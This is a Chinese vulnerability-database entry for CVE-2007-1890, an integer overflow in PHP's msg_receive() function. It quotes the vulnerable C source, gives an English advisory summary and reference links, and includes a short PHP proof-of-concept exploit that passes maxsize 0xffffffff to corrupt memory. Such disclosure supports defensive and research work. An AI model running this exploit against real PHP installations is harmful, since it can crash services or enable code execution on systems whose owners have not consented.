PHP msg_receive()内存分配整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112585 漏洞类型 边界条件错误
发布时间 2007-03-31 更新时间 2007-04-10
CVE编号 CVE-2007-1890 CNNVD-ID CNNVD-200704-100
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29808
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-100
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的msg_receive()函数实现上存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限。PHP的msg_receive()函数没有对maxsize参数执行任何检查便直接在内存分配中使用,导致整数溢出。有漏洞的代码如下:PHP_FUNCTION(msg_receive){...if(zend_parse_parameters(ZEND_NUM_ARGS()TSRMLS_CC,"rlzlz|blz",&queue,&desiredmsgtype,&out_msgtype,&maxsize,&out_message,&do_unserialize,&flags,&zerrcode)==FAILURE){return;}...messagebuffer=(structphp_msgbuf*)emalloc(sizeof(structphp_msgbuf)+maxsize);result=msgrcv(mq->id,messagebuffer,maxsize,desiredmsgtype,realflags);如果内部的msgrcv()函数能够接受负数的maxsize的话,就可能导致缓冲区溢出。
|漏洞EXP
source: http://www.securityfocus.com/bid/23236/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects PHP versions prior to 4.4.5 and 5.2.1. 

<?php

  $MSGKEY = 519052;

  $msg_id = msg_get_queue ($MSGKEY, 0600);

  if (!msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
    echo "Msg not sent because $msg_err\n";

  if (msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
    echo "$msg\n";
  } else {
    echo "Received $msg_error fetching message\n";
    break;
  }

  msg_remove_queue ($msg_id);

?>
|参考资料

来源:BID
名称:23236
链接:http://www.securityfocus.com/bid/23236
来源:MISC
链接:http://www.php-security.org/MOPB/MOPB-43-2007.html